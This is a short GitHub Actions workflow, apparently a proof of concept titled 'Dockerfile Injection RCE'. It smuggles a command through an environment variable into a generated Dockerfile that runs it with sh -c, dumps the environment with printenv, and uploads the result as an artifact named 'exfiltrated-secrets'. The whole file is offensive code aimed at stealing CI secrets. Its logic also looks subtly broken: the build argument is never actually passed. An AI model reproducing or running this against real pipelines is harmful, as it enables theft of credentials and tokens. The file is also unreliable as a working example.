name: Dockerfile Injection RCE

on:
  push:
    branches: [main]

jobs:
  exploit:
    runs-on: ubuntu-latest
    env:
      PYTHON_VERSION: 'RUN printenv > /leak.txt'

    steps:
    - name: Checkout repo
      uses: actions/checkout@v4

    - name: Create malicious Dockerfile
      run: |
        echo "FROM alpine" > Dockerfile
        echo "ARG PYTHON_VERSION" >> Dockerfile
        echo 'RUN echo "Injected version: ${PYTHON_VERSION}" && sh -c "${PYTHON_VERSION}"' >> Dockerfile

    - name: Build image with injected command
      run: |
        docker build -t hacked-image .

    - name: Extract leaked secrets from container
      run: |
        docker run --rm hacked-image cat /leak.txt > leak.txt

    - name: Upload secrets as artifact
      uses: actions/upload-artifact@v4
      with:
        name: exfiltrated-secrets
        path: leak.txt
